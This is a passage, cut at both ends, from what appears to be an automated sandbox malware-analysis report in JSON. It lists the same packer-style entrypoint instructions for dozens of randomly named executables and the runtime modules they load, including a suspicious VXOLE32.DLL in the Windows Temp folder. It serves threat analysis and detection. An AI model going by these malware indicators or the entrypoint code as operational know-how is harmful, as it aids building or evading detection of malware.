ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rfbrlrh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"blpjp.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"vllrv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hpjbbfh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4000248.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"vptfx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"dvlvp.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"pdljr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"brvtdb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2846688.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"488862.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"06448.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"vjrdb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"tdplj.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"02482.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"86844.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"njnplr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"jbvjrv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"djhxhx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rdtdhx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"jhhhxxb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"llfppf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hxfnr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xtxdjfh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" loaded module \"KERNEL32\" at base 75630000\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"026026.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"026026.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"026026.exe\" loaded module \"KERNEL32\" at base 75630000\n \"026026.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"026026.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"026026.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75010000\n \"hfxjvn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"hfxjvn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hfxjvn.exe\" loaded module \"KERNEL32\" at base 75630000\n \"hfxjvn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hfxjvn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"hfxjvn.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75010000\n \"lbvtbl.exe\" loaded module \"MSVCRT.DLL\" at base 75ec0000\n \"lbvtbl.exe\" loaded module \"SHLWAPI.DLL\" at base 76e00000\n \"lbvtbl.exe\" loaded module \"USER32.DLL\" at base 76e60000\n \"lbvtbl.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75010000\n \"22428.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"22428.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"22428.exe\" loaded module \"KERNEL32\" at base 75630000\n \"22428.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"22428.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"66488.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"66488.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"66488.exe\" loaded module \"KERNEL32\" at base 75630000\n \"66488.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"66488.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"068466.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"068466.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"068466.exe\" loaded module \"KERNEL32\" at base 75630000\n \"068466.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"068466.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"06200.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"06200.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"06200.exe\" loaded module \"KERNEL32\" at base 75630000\n \"06200.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"06200.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"06200.exe\" loaded module \"MSVCRT.DLL\" at base 75ec0000\n \"06200.exe\" loaded module \"SHLWAPI.DLL\" at base 76e00000\n \"06200.exe\" loaded module \"USER32.DLL\" at base 76e60000\n \"06200.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75010000\n \"0484046.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"0484046.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0484046.exe\" loaded module \"KERNEL32\" at base 75630000\n \"0484046.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"drpdftl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"drpdftl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"drpdftl.exe\" loaded module \"KERNEL32\" at base 75630000\n \"drpdftl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"drpdftl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"frbnxt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"frbnxt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"frbnxt.exe\" loaded module \"KERNEL32\" at base 75630000\n \"frbnxt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"frbnxt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"bfllh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75010000\n \"hptntt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"hptntt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hptntt.exe\" loaded module \"KERNEL32\" at base 75630000\n \"hptntt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vtrppln.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"vtrppln.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vtrppln.exe\" loaded module \"KERNEL32\" at base 75630000\n \"vtrppln.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vtrppln.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"rdttflx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"rdttflx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rdttflx.exe\" loaded module \"KERNEL32\" at base 75630000\n \"rdttflx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rdttflx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"lllfpll.exe\" loaded module \"MSVCRT.DLL\" at base 75ec0000\n \"lllfpll.exe\" loaded module \"SHLWAPI.DLL\" at base 76e00000\n \"lllfpll.exe\" loaded module \"USER32.DLL\" at base 76e60000\n \"lllfpll.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75010000\n \"lxrhrth.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"lxrhrth.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lxrhrth.exe\" loaded module \"KERNEL32\" at base 75630000\n \"lxrhrth.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lxrhrth.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"4228006.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"4228006.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4228006.exe\" loaded module \"KERNEL32\" at base 75630000\n \"4228006.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4228006.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"2820044.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"2820044.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"2820044.exe\" loaded module \"KERNEL32\" at base 75630000\n \"2820044.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2820044.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"2820044.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75010000\n \"8600684.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"8600684.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8600684.exe\" loaded module \"KERNEL32\" at base 75630000\n \"8600684.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2006628.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"2006628.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"2006628.exe\" loaded module \"KERNEL32\" at base 75630000\n \"2006628.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2006628.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"fpplvv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"fpplvv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fpplvv.exe\" loaded module \"KERNEL32\" at base 75630000\n \"fpplvv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fpplvv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"dpjjvjv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706f0000\n \"dpjjvjv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dpjjvjv.exe\" loaded module 